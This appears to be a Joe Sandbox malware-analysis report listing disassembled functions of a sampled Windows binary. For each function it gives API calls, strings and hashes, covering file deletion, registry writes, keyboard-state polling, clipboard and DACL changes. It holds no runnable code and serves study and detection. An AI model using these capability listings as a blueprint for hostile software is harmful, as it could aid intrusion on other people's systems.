Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 964f58c9cdfca430807cf33729d3126d33ebe8af800b8a09476c1e522e0f285e
Instruction ID: 6d0046dad370e80d4a4e7d0649cc5278bf756b53227720aade5a4461ec4575f3
Opcode Fuzzy Hash: 964f58c9cdfca430807cf33729d3126d33ebe8af800b8a09476c1e522e0f285e
Instruction Fuzzy Hash: BDA11DB1508344ABC710EFA4CC86DAFB7ECAF94704F404919F59587192EA78DA09EB62

Function 00F6EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00F6EFB6
_wcscmp.LIBCMT ref: 00F6EFCB
_wcscmp.LIBCMT ref: 00F6EFE2
GetFileAttributesW.KERNEL32(?), ref: 00F6EFF4
SetFileAttributesW.KERNEL32(?,?), ref: 00F6F00E
FindNextFileW.KERNEL32(00000000,?), ref: 00F6F026
FindClose.KERNEL32(00000000), ref: 00F6F031
FindFirstFileW.KERNEL32(*.*,?), ref: 00F6F04D
_wcscmp.LIBCMT ref: 00F6F074
_wcscmp.LIBCMT ref: 00F6F08B
SetCurrentDirectoryW.KERNEL32(?), ref: 00F6F09D
SetCurrentDirectoryW.KERNEL32(00FB8920), ref: 00F6F0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 00F6F0C5
FindClose.KERNEL32(00000000), ref: 00F6F0D2
FindClose.KERNEL32(00000000), ref: 00F6F0E4

Strings

*.*, xrefs: 00F6F048

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 996ff1d9c84e0af6c83dc0f1cbe2e670c95c353cccf024c934c912e358e8f01e
Instruction ID: cdb479caffcc77159abdb5f957b1142929504b4d398a33bbd4e2bba4e97055c1
Opcode Fuzzy Hash: 996ff1d9c84e0af6c83dc0f1cbe2e670c95c353cccf024c934c912e358e8f01e
Instruction Fuzzy Hash: 9E31A23290121D7FDF14EFA4EC49AEE77AC9F49360F144175E805E20A1DB74DA88EB61

Function 00F80857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F80953
RegCreateKeyExW.ADVAPI32(?,?,00000000,00F8F910,00000000,?,00000000,?,?), ref: 00F809C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F80A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F80A92
RegCloseKey.ADVAPI32(?), ref: 00F80DB2
RegCloseKey.ADVAPI32(00000000), ref: 00F80DBF

Strings

REG_SZ, xrefs: 00F80AD0
REG_DWORD, xrefs: 00F80C83
REG_MULTI_SZ, xrefs: 00F80B7A
REG_EXPAND_SZ, xrefs: 00F80A2F
REG_QWORD, xrefs: 00F80D00
REG_BINARY, xrefs: 00F80D4D

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 9e70875198d22d3ce8c02daa4ff89f61af1fbfc63441ee78c1d7bd46df0e4fae
Instruction ID: 9f5aa3256af274efa5182274226a1fa96325652e424bb57ad8dbf3156312376b
Opcode Fuzzy Hash: 9e70875198d22d3ce8c02daa4ff89f61af1fbfc63441ee78c1d7bd46df0e4fae
Instruction Fuzzy Hash: A4029C756046019FCB54EF24C841E6AB7E5FF89320F44885CF88A9B3A2DB74ED45EB81

Function 00F6F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00F6F113
_wcscmp.LIBCMT ref: 00F6F128
_wcscmp.LIBCMT ref: 00F6F13F

Part of subcall function 00F64385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F643A0

FindNextFileW.KERNEL32(00000000,?), ref: 00F6F16E
FindClose.KERNEL32(00000000), ref: 00F6F179
FindFirstFileW.KERNEL32(*.*,?), ref: 00F6F195
_wcscmp.LIBCMT ref: 00F6F1BC
_wcscmp.LIBCMT ref: 00F6F1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 00F6F1E5
SetCurrentDirectoryW.KERNEL32(00FB8920), ref: 00F6F203
FindNextFileW.KERNEL32(00000000,00000010), ref: 00F6F20D
FindClose.KERNEL32(00000000), ref: 00F6F21A
FindClose.KERNEL32(00000000), ref: 00F6F22C

Strings

*.*, xrefs: 00F6F190

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 120664ed2e01e0d437e511f3df3b7ccabb6df4da82bd433c563e53a044061117
Instruction ID: 31d8113e49b3ca9e04ac911ed56708a44740a7fd3de1e79efe1e1f856cab033e
Opcode Fuzzy Hash: 120664ed2e01e0d437e511f3df3b7ccabb6df4da82bd433c563e53a044061117
Instruction Fuzzy Hash: 4131823690021E6EDF10AEA4FC59AEE77AC9F85370F140175E904E21A0DB34DA49EF65

Function 00F6A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F6A20F
__swprintf.LIBCMT ref: 00F6A231
CreateDirectoryW.KERNEL32(?,00000000), ref: 00F6A26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F6A293
_memset.LIBCMT ref: 00F6A2B2
_wcsncpy.LIBCMT ref: 00F6A2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F6A323
CloseHandle.KERNEL32(00000000), ref: 00F6A32E
RemoveDirectoryW.KERNEL32(?), ref: 00F6A337
CloseHandle.KERNEL32(00000000), ref: 00F6A341

Strings

:, xrefs: 00F6A252
\, xrefs: 00F6A247
\??\%s, xrefs: 00F6A22B

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: d3105bed18d23f4a13ec3b6ac078fe775c7907d71fb75afdb6df0b2d29e1021a
Instruction ID: 809a0152be25844bd86a167f290ab60b4b699fe739d816b7b2172f6db6a0f5fc
Opcode Fuzzy Hash: d3105bed18d23f4a13ec3b6ac078fe775c7907d71fb75afdb6df0b2d29e1021a
Instruction Fuzzy Hash: 2131B0B1900119ABDB20DFA0DC49FEB77BCEF88750F1040B6F508E2160EB759648AB25

Function 00F57CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F58202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F5821E
Part of subcall function 00F58202: GetLastError.KERNEL32(?,00F57CE2,?,?,?), ref: 00F58228
Part of subcall function 00F58202: GetProcessHeap.KERNEL32(00000008,?,?,00F57CE2,?,?,?), ref: 00F58237
Part of subcall function 00F58202: HeapAlloc.KERNEL32(00000000,?,00F57CE2,?,?,?), ref: 00F5823E
Part of subcall function 00F58202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F58255

Part of subcall function 00F5829F: GetProcessHeap.KERNEL32(00000008,00F57CF8,00000000,00000000,?,00F57CF8,?), ref: 00F582AB
Part of subcall function 00F5829F: HeapAlloc.KERNEL32(00000000,?,00F57CF8,?), ref: 00F582B2
Part of subcall function 00F5829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F57CF8,?), ref: 00F582C3

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F57D13
_memset.LIBCMT ref: 00F57D28
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F57D47
GetLengthSid.ADVAPI32(?), ref: 00F57D58
GetAce.ADVAPI32(?,00000000,?), ref: 00F57D95
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F57DB1
GetLengthSid.ADVAPI32(?), ref: 00F57DCE
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F57DDD
HeapAlloc.KERNEL32(00000000), ref: 00F57DE4
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F57E05
CopySid.ADVAPI32(00000000), ref: 00F57E0C
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F57E3D
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F57E63
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F57E77

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 9bee42c56c271632b5aa702aaaeb583aaa09b27ab6ce871ddc447ba6a8a36604
Instruction ID: 558d70c15e48c67e092aa0358c0a8fd54de596fad5324ebb7386d8fbd43f62ac
Opcode Fuzzy Hash: 9bee42c56c271632b5aa702aaaeb583aaa09b27ab6ce871ddc447ba6a8a36604
Instruction Fuzzy Hash: 01616A71904209AFDF00DFA1EC85AFEBB79FF04311F148169FA15A6291DB359E09EB60

Function 00F166E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON

Download Yara Rule

Strings

NO_START_OPT), xrefs: 00F5114F
UTF), xrefs: 00F510FA
UTF16), xrefs: 00F510CF
UCP), xrefs: 00F5110D
BSR_UNICODE), xrefs: 00F51338
BSR_ANYCRLF), xrefs: 00F5131E
ANY), xrefs: 00F512DE
LF), xrefs: 00F512A4
CR), xrefs: 00F51287
LIMIT_RECURSION=, xrefs: 00F511FC
ANYCRLF), xrefs: 00F512FB
CRLF), xrefs: 00F512C1
LIMIT_MATCH=, xrefs: 00F51170
NO_AUTO_POSSESS), xrefs: 00F5112E

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: c508305bfb7a8aee55717990092f7a2e535bb253264825b95dce497561d04e29
Instruction ID: 58391fe7d1fa041d4fb8f5ba6458e4b031c7577c57f1df86b3855e786036b791
Opcode Fuzzy Hash: c508305bfb7a8aee55717990092f7a2e535bb253264825b95dce497561d04e29
Instruction Fuzzy Hash: 4472A076E00219DBDB14CF59C8807EEB7B5FF48321F14816AE905EB281EB749D85EB90

Function 00F6001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00F60097
SetKeyboardState.USER32(?), ref: 00F60102
GetAsyncKeyState.USER32(000000A0), ref: 00F60122
GetKeyState.USER32(000000A0), ref: 00F60139
GetAsyncKeyState.USER32(000000A1), ref: 00F60168
GetKeyState.USER32(000000A1), ref: 00F60179
GetAsyncKeyState.USER32(00000011), ref: 00F601A5
GetKeyState.USER32(00000011), ref: 00F601B3
GetAsyncKeyState.USER32(00000012), ref: 00F601DC
GetKeyState.USER32(00000012), ref: 00F601EA
GetAsyncKeyState.USER32(0000005B), ref: 00F60213
GetKeyState.USER32(0000005B), ref: 00F60221

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: ddc15e9b48eabec6c82eaa2c59ad98b656b993c5e5b6d612c35b7c6e735cc1e5
Instruction ID: 921768a5ec0ea722724b19ad9416bc29690112d9debf454bc75cdc9585bcbf98
Opcode Fuzzy Hash: ddc15e9b48eabec6c82eaa2c59ad98b656b993c5e5b6d612c35b7c6e735cc1e5
Instruction Fuzzy Hash: 5D51F930D0478829FB35DBA088157EBBFB49F12390F18459ED5C25B1C2DEA49B8CE761

Function 00F803DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F80E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F7FDAD,?,?), ref: 00F80E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F804AC

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F8054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F805E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F80822
RegCloseKey.ADVAPI32(00000000), ref: 00F8082F

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 288564bef52699db3229695f90e21252ea3b8894c8baf97ced7afa5c9d350644
Instruction ID: 6f514969d0fbe017b024680e6d9f23be397fdff328b86491e08a012855bbbda0
Opcode Fuzzy Hash: 288564bef52699db3229695f90e21252ea3b8894c8baf97ced7afa5c9d350644
Instruction Fuzzy Hash: 68E17F71604204AFCB54EF24CC91E6ABBE4EF89314F44856DF849DB2A2DB34E845EB91

Function 00F783BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

CoInitialize.OLE32 ref: 00F78403
CoUninitialize.OLE32 ref: 00F7840E
CoCreateInstance.OLE32(?,00000000,00000017,00F92BEC,?), ref: 00F7846E
IIDFromString.OLE32(?,?), ref: 00F784E1
VariantInit.OLEAUT32(?), ref: 00F7857B
VariantClear.OLEAUT32(?), ref: 00F785DC

Strings

Invalid parameter, xrefs: 00F784FA
Failed to create object, xrefs: 00F78479, 00F7852F
NULL Pointer assignment, xrefs: 00F784B3

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 56aa7d7bb0193bd0b27cca3785f1ec95b1d1d7e9b972208e634a21c1c38a6361
Instruction ID: acb1a359d23963c85141eb435447a27feb77869e423a7cf66c54c771c0b0ab5a
Opcode Fuzzy Hash: 56aa7d7bb0193bd0b27cca3785f1ec95b1d1d7e9b972208e634a21c1c38a6361
Instruction Fuzzy Hash: DB61E2716083129FC710DF14C848F6AB7E8AF487A4F04841EF9899B291DB74ED49EB93

Function 00F74164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00F7418B
EmptyClipboard.USER32 ref: 00F74191
GlobalAlloc.KERNEL32(00000002,?), ref: 00F741A6
CloseClipboard.USER32 ref: 00F74245

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 619c557c6b73c8341837fc8409080f5f6d682e19dc1240146a928a48032175c9
Instruction ID: b07b7e227b69017ec83c2c5ada280625883bd9c713646633a086ce82a38a994e
Opcode Fuzzy Hash: 619c557c6b73c8341837fc8409080f5f6d682e19dc1240146a928a48032175c9
Instruction Fuzzy Hash: 4421A3756002149FDB11AF64DC09BBD7BA8EF04721F54C02AF94ADB2A2EB74BC40EB55

Function 00F637EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F04743,?,?,00F037AE,?), ref: 00F04770

Part of subcall function 00F64A31: GetFileAttributesW.KERNEL32(?,00F6370B), ref: 00F64A32

FindFirstFileW.KERNEL32(?,?), ref: 00F638A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00F6394B
MoveFileW.KERNEL32(?,?), ref: 00F6395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00F6397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00F6399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00F639B9

Strings

\*.*, xrefs: 00F6384E, 00F63857, 00F6386C

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: bbf18158e5d4d3457dbce8172f02b4beca86d5bb961cae3012cfa59592a5219f
Instruction ID: 64606b3e616a76e6368e89f8bc773e48320bf4134151b97f386aaca3863c4c8f
Opcode Fuzzy Hash: bbf18158e5d4d3457dbce8172f02b4beca86d5bb961cae3012cfa59592a5219f
Instruction Fuzzy Hash: 68516931C0514DAACF05FBA0DD929EEB779AF15310F6000A9E402B6192EB696F0DFF61

Function 00F6F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00F6F440
Sleep.KERNEL32(0000000A), ref: 00F6F470
_wcscmp.LIBCMT ref: 00F6F484
_wcscmp.LIBCMT ref: 00F6F49F
FindNextFileW.KERNEL32(?,?), ref: 00F6F53D
FindClose.KERNEL32(00000000), ref: 00F6F553

Strings

*.*, xrefs: 00F6F425

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: d1040563f7407e937eb59bfb9db171072d1c8aa898d1a43041ef4489d82fef5a
Instruction ID: f7311ad19591068435da0ec15e8f3a749cb134ab285696cee6db3fa53981d64d
Opcode Fuzzy Hash: d1040563f7407e937eb59bfb9db171072d1c8aa898d1a43041ef4489d82fef5a
Instruction Fuzzy Hash: D3414A72D0421AAFDF14EF64EC45AEEBBB4EF05320F144466E815A2191EB34AE49EB50

Function 00F15760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F158A5
_memmove.LIBCMT ref: 00F158F5
_memmove.LIBCMT ref: 00F1595B

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 8c66a0acc16e3dfa9f190482d1a678ff7b1642df86c0063c64bbb2efdbf29025
Instruction ID: 643623809d47f3290ebbfa97070198bfa2d8bf887f4ac39415fb6ba4173794fa
Opcode Fuzzy Hash: 8c66a0acc16e3dfa9f190482d1a678ff7b1642df86c0063c64bbb2efdbf29025
Instruction Fuzzy Hash: BA12AD70A00A09DFCF04DFA5D981AEEB7F5FF88310F104529E846A7290EB39AD55EB51

Function 00F63B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F04743,?,?,00F037AE,?), ref: 00F04770

Part of subcall function 00F64A31: GetFileAttributesW.KERNEL32(?,00F6370B), ref: 00F64A32

FindFirstFileW.KERNEL32(?,?), ref: 00F63B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 00F63BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 00F63BEA
FindClose.KERNEL32(00000000), ref: 00F63C01
